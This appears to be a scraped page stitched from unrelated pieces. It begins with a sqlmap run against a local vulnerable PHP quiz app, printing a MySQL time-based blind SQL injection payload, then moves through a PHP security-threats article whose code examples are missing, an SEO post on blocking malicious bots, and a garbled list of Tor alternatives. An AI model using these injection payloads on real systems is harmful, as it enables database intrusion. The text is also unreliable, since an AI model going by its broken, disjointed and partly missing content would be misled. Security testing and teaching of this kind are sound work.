#> sqlm -u "http://127.0.0.1/vul_test/SimplePHPQuiz/process_quizAdd.php" --data="question=0000&correct_answer=99aaa99&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit" --risk 3 --dbs --no-cast -p correct_answer

...snip...

POST parameter 'correct_answer' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 117 HTTP(s) requests:
---
Parameter: correct_answer (POST)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: question=0000&correct_answer=99aaa99' AND (SELECT * FROM (SELECT(SLEEP(5)))FvVg) AND 'ZQRo'='ZQRo&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit
---
[17:52:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.10

Be aware of the most common security threats to PHP applications is the important step to secure your PHP scripts may not be immune.  Here, the article is going to go over top 6 common security threads in PHP scripts. You may familiar with this, if not, this is a good time for you to read and keep in mind.

1. SQL injection

SQL injection is a kind of attack that malicious users enter SQL in form fields in a way that affects the execution of SQL statements. A variation is command injection, where user data is passed through system() or exec(). It shares the same mechanism as SQL injection but for shell commands.

The above code, there is not proper filtered/escaped on user input value ($_POST[‘username’]) on Line 1. This query could fail or even damage the DB if $username has a wrong format or contains substrings that transform your SQL statement to something else.

Preventing SQL injection

Options:

• Filter data using mysql[i]_real_escape_string()
• Manually check each piece of data is of the right type
• Use prepared statements and bind variables

Use prepared prepared statements

• Separating data and SQL logic
• The prepared statements will do filtering (e.g., escape) automatically
• Use it as a coding standard, can help limit problems caused by new developers within your organization.

2. XSS

XSS (Cross Site Scripting) is an attack by a user where they enter some data to your website that includes a client side script (generally JavaScript). If you output this data to another web page without filtering it, this script will be executed.

Accept text comments from user

Outputting comments to (another) user:

What’s going to happen??

• Annoying popups
• Refresh or redirections
• Corrupted pages or forms
• Steal cookies
• AJAX ( XMLHttpRequest )

Preventing XSS

In order to prevent XSS attact, proper filter output to the browser through htmlentities() in PHP. Basic usage of htmlentities() is simple, but there are many advanced controls. See the XSS cheat sheet at here.

3. Session fixation

Session security works on the assumption that a PHPSESSID is hard to guess. However, PHP can either accept a session id through a cookie or through the URL. Tricks a victim to use a specific (or another) session

ID or a phishing attack is possible.

4. Session capturing and hijacking

It’s the same idea of Session fixation, however, it involves stealing the session ID. If session IDs are stored in cookies, attackers can steal them through XSS and JavaScript. Session IDs can also be sniffed or obtained from proxy servers if contained in the URL.

Preventing Session capturing and hijacking

• Regenerate IDs
• If using sessions, always user SSL

5. Cross Site Request Forgeries (CSRF)

CSRF refers to a request for a page that looks like it was initated by a site’s trusted users, but wasn’t deliberately. Many variations. One of the example:

Preventing Cross Site Request Forgeries

In general make sure the users come from your forms, and each form submission is matched to an individual form that you send out. There are two guides have to remember:

• User session with appropiate security measures, e.g.: Regenerate IDs and user SSL for every session.
• Generate another one-time token and embed it in the form, save it in the session (one of the session variable), and check it on submission.

6. Code injection

Code injection is the exploitation of a computer bug that is caused by processing invalid data. The problem occurs when you accidentally execute arbitrary code, typically through file inclusion. Poorly written code can allow a remote file to be included and executed. Many PHP functions such as require can take an URL or a filename. Example:

The example on above, Passing user input as a filename or part of a filename invites users to start filenames with “http://”.

Prevent Code Injection

• Filter user input
• Disable allow_url_fopen and/or allow_url_include setting in php.ini.  This disables require/include/fopen of remote files.

Other general principles

• Don’t rely on server configuration to protect you especially if your web server/PHP is managed by your ISP, or if your web site might bebe migrated/deployed somewhere else in future migrated/deployed somewhere else in future. Embed the security-aware checking/logic in the website code (PHP, HTML, JavaScript, etc.)
• Design your server-side scripts with security from the ground up: e.g., use a single line of execution that begins with a single point of authentication and data cleaning

  – E.g., delegate all login/security checking logic in one PHP function/file to be included in all security-sensitive pages

  – Problems can be easily checked and solved

• Keep your code up to date.  Stay on top of patches and advisories

(Image created by the author)

The Bot Bandits Are Out of Control

I’ve always known that bots crawl my websites and the sites of all my fellow developers, but I was unaware that bots now make more visits than people do to most websites. Yep, they officially overtook us in 2012, and bots now dominate website visits. Egad, it’s Star Wars run amok!

Before we become alarmed, though, let’s look at a few facts that demonstrate the preponderance of bots in our midst.

The bots are coming. The bots are coming. The bots are here!

(Image source)

Incapsula’s 2013 bot traffic report states that “Bot visits are up 21% to represent 61.5% of all website traffic.” If bots are preponderant, what does that mean for us?

For those of you just tuning in, preponderance means “the quality or fact of being greater in number, quantity, or importance.” That means the bots are “more important than humans” in determining the value of websites to potential readers.

A quick look at antonyms for preponderance reveals that our plight is worse than expected. Antonyms for preponderance include disadvantage, inferiority, subordination, subservience, surrender and weakness.

All is not lost, however. Not all bots are bad. In fact, in the wild and woolly world of SEO, Googlebots are actually our friends. A “Googlebot” is Google’s web crawling bot, also known as a “spider,” that crawls the Internet in search of new pages and websites to add to Google’s index.

Googlebots: Our Ally in the Bot Wars

If we think of the web as an ever-growing library with no central filing system, we can understand exactly what a Googlebot wants. A Googlebot’s mission is to crawl this library and create a filing system. Bots need to be able to quickly and easily crawl sites. When a Googlebot arrives at your site, its first point of access is your site’s robot.txt file, which highlights the importance of ensuring it’s easy for the bots to crawl your robots.txt file. The less time Googlebots spend on irrelevant portions of your site, the better. At the same time, be sure you have not inadvertently siloed or blocked pages of your site that should not be blocked.

(Image source)

Next, Googlebots use the sitemap.xml file to discover all areas of your site. The first rule of thumb is this: keep it simple. Googlebots do not crawl DHTML, Flash, Ajax nor JavaScript as well as they crawl HTML. Since Google has been less than forthcoming about how its bots crawl JavaScript and Ajax, avoid using this code for your site’s most important elements. Next, use internal linking to create a smart, logical structure that will help the bots efficiently crawl your site. To check the integrity of your internal linking structure, go to Google Webmaster Tools -> Search Traffic -> Internal Links. The top-linked pages should be your site’s most important pages. If they aren’t, you need to rethink your linking structure.

So, how do you know if the Googlebots are happy? You can analyze Googlebot’s performance on your site by checking for crawl errors. Simply go to Webmaster Tools -> Crawl and check the diagnostic report for potential site errors, URL errors, crawl stats, site maps and blocked URLs.

The Enemy in our Midst: Bandit Bots

Googlebots aren’t the only bots visiting your site. In fact, over 38% of the bots crawling our sites are out for no good. So not only are we out-numbered, but nearly 2 out of every 5 visitors to your site are trying to steal information, exploit security loopholes and pretend to be something they are not.

We’ll call these evil bots “bandit bots”.

So, what are we to do?

As an SEO provider and website developer, I could protest. I could blog my little heart out and get a few friends to join me. Or I could buckle down and take responsibility for my own little corner of the web and fight back against the bandit bots.

Let’s do this together.

Bandit Bots: What They Are and How to Fight Back

The bad guys come in four flavors. Learn which bots to watch out for and how to fight back.

Scrapers

These bandit bots steal and duplicate content, as well as email addresses. Scraper bots normally focus on retrieving data from a specific website. They also try to collect personal information from directories or message boards. While scraper bots target a variety of different verticals, common industries include online directories, airlines, e-commerce sites and online property sites. Scraper bots will also use your content to intercept web traffic. Additionally, multiple pieces of scraped content can be scrambled together to make new content and allow them to avoid duplicate content penalties.

What’s at risk: Scrapers grab your RSS feed so they know when you publish content. However, if you don’t know that your site is being attacked by scrapers, you may not realize there’s a problem. In the eyes of Google, however, ignorance is no excuse. Your website could be hit by severe penalties for duplicate content and even fail to appear in search engine rankings.

How to fight back: Be proactive and attentive to your site, thus increasing the likelihood that you can take action before severe damage is done.

There are two good ways to identify if your site is the victim of a scraper attack. One option is to use a duplicate-content detection service like Copyscape to see if any duplicate content comes up.

(Image created by the author)

A second option for alerting you that content might have been stolen from your site is to use trackbacks within your own content. In general, it’s good SEO to include one or two internal site links within your written content. When you include these links, be sure to activate WordPress’s trackback feature. In the trackback field on your blog’s entry page, simply enter the URL of the article you are referencing. (In this case, it will be one on your own websites, not another site).

(Image created by the author)

You can manually look at your trackbacks to see what sites are using your links. If you find that your content has been re-posted without your permission on a spam site, file a DMCA-complaint with Google.

Finally, if you know the IP address from which scraper bots are operating, you can block them from your feed directly. Add the following code to your .htaccess files. Learn how to edit your .htaccessfile. (See editing your .htaccess file on WordPress.)

RewriteEngine on
RewriteCond %{REMOTE_ADDR} ^69.16.226.12
RewriteRule ^(.*)$ http://newfeedurl.com/feed

In this example, 69.16.226.12= is the IP address you want to send to andhttp://newfeedurl.com/feed is the custom content you want to send them.

Warning! Be very careful editing this file. It could break your site if done incorrectly. If you are unsure of how to edit this file, ask for help from a web developer.

Hacking Tools

Hacking bandit bots target credit cards and other personal information by injecting or distributing malware to hijack a site or server. Hacker bots also try to deface sites and delete critical content.

What’s at risk: It goes without saying that should your site be the victim of a hacking bot, your customers could lose serious confidence in the security of your site for e-commerce transactions.

How to fight back: Most of the attacked sites are victims of “drive-by hackings,” which are site hackings done randomly and with little regard for the impacted business. To prevent your site from becoming a hacking victim, make a few basic modifications to your .htaccess file, which is typically found in the public_html directory. This is a great starter list of common hacking bots. Copy and paste this list into the .htaccess file to block any of these bots from accessing your site. You can add bots, remove bots and otherwise modify the list as necessary.

Spammers

Spam bots load sites with garbage to discourage legitimate visits, turn targeted sites into link farms and bait unsuspecting visitors with malware/phishing links. Spam bots also participate in high volume spamming in order to cause a website to be blacklisted in search results and destroy your brand’s online reputation.

What’s at risk: Failure to protect your site from spammers can cause your website to be blacklisted, destroying all your hard work at building a credible online presence.

How to fight back: Real-time malicious traffic detection is critical to your site’s security, but most of us don’t have the time to simply sit around and monitor our site’s traffic patterns. The key is to automate this process.

If you’re using WordPress, one of the first steps to fighting back against spam bots is to stop spam in the first place. Start by installing Akismet; it is on all my personal sites as well as the sites I manage for my client. Next, install a trusted security plugin and setup automatic backups of your database.

(Image create by the author)

Require legitimate registration with CAPTCHAs for all visitors who want to make comments or replies. Finally, follow wordpress.org to learn what’s new in the world of security.

Click Frauders

Click fraud bots make PPC ads meaningless by “clicking” on the ads so many times you effectively spend your entire advertising budget, but receive no real clicks from interested customers. Not only do these attacks drain your ad budget, they also hurt your ad relevance score for whatever program you may be using. Google AdWords and Facebook ads are the most frequent targets of these attacks.

What’s at risk: Click fraud bots waste your ad budget with meaningless clicks and prevent interested customers from actually clicking on your ad. Worse, your Ad Relevance score will plummet, destroying your credibility and making it difficult to compete for quality customers in the future.

How to fight back: If your WordPress site is being targeted by click fraud bots, immediately download and install the Google AdSense Click Fraud monitoring plugin. The plugin counts all clicks on your ads. Should the clicks exceed a specified number, the IP address for the clicking bot (or human user) is blocked. The plugin also blocks a list of specific IP addresses. The plugin is specifically for the Adsense customers to install on their websites; AdWords customers have no capabilities to implement this plugin.

(Image created by the author)

When defending a website from hacker bots, it takes a concentrated effort to thwart their attacks. While the above steps are important and useful, there are some attacks, like coordinated DDoS, that you simply cannot fight off on your own. Fortunately, a number of tech security companies specialize in anti-DDoS tools and services. If you suspect your site (or one of your client’s sites) is being targeted for DDoS, such companies can be key to a successful defense.

I recommend following wordpress.org to learn what’s new in the world of security.

Summary

Giving honest Googlebots what they want is quite simple. Develop strong, relevant content and publish regularly. Combatting the fake Googlebots and other bot bandits is a bit tougher. Like many things in life, it requires diligence and hard work.

Here is best anonymous browsing browsers that are better that TOR browser. List of browsers are given select any and download and use to have private browsing in your computer.

Best Alternatives to Tor Browser for Anonymous Browsing

1. I2P

I2P is an anonymous per to peer-to-peer distributes communication layer which is for open source tools. The software implementing this computer network layer is called I2P layer such as P2P software. Specially, it is designed for security services and is compatible faster than Tor and is full on alternative to TOR . It’s self oranising and distributed potential.

2. Freenet

Freenet is considered as a peer-to-peer to dislike the censorship same as to I2P.It utilizes the similar P2P tools of diffusing data storage to distribute and keep the information but divide the set of rules of user interface and network structure. It comes out with two-tier safety measures such as Darknet and Opennet.

3. Freepto

Freepto is a dissimilar Linux-based Operating System that is booted using a USB Disk on any PC. It is easy to run and is faster in saving your encrypted data. The data is encrypted which is put it into your disk. It offers hacktivists the straightwforward way to communicate in the similar way as Tor.

4. JonDo Live-CD

JonDo Live-CD , one of the Linux based OS that provides you pre-configured applications to be used for web surfing. It includes Thinderbird, Torbrowser, and may other programs.

5. Tox

Tox is considered not a complete standby for Tor, but helps in providing you the messaging services. It provides you many more advanced features as private and encrypted IM, video conferencing and calls i.e. a user- friendly browser.

6. Lightweight Portable Security (LPS)

It creates a safe passage between end nodes from dependable media on any nearly located Intel-based PC. It also boot up CD from Linux operating system. Administrator benefits are not required and not anything is installed.

7. IprediaOS

Ipredia OS is a fast, commanding and firm opertaing system that is totally based on Linux that provides you an unspecified environment. All the traffic is encrypted and anonymized. Many apps are available in Ipredia OS, can be in any form as mail, peer-to-peer, bittorrent.